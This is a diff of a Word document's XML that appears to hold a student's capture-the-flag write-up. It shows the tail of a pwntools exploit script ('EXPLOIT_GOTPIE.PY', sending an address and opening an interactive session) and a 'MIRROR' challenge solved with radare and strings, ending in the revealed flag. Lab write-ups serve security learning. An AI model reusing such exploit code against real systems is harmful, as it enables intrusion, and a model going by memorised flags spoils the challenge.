+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sendline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="4ec9b0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">str</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="569cd6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="b5cea8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">404048</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="6a9955"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#exit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:fill="1f1f1f" w:val="clear"/>
+        <w:spacing w:line="325.71428571428567" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="9cdcfe"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="dcdcaa"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">interactive</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:color w:val="1155cc"/>
           <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="1155cc"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="1155cc"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1155cc"/>
+          <w:u w:val="single"/>
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:t xml:space="preserve">EXPLOIT_GOTPIE.PY</w:t>
@@ -9897,201 +11415,6 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:t xml:space="preserve">()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-          <w:color w:val="cccccc"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -16528,8 +17851,8 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
           <w:color w:val="cccccc"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -16572,6 +17895,283 @@
         </w:rPr>
         <w:t xml:space="preserve">()</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:b w:val="1"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:b w:val="1"/>
+          <w:color w:val="9900ff"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:b w:val="1"/>
+          <w:color w:val="9900ff"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">MIRROR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
+          <w:color w:val="cccccc"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I used radare ,the command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:color w:val="ff0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">iz</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, to look for any useful strings in the program. I found some tip about how the flag was mirrored and i found it like that. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}803998_ekoPWOOOOOLS_ereh_yllaniF{ZTIRPS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i mirrored it and i found the flag</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SPRITZ{Finally_here_SLOOOOOWPoke_899038}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:color w:val="ff0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:color w:val="ff0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">strings honeydex_1193389 | grep "ZTIRPS"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:firstLine="0"/>
+        <w:rPr>
+          <w:b w:val="1"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
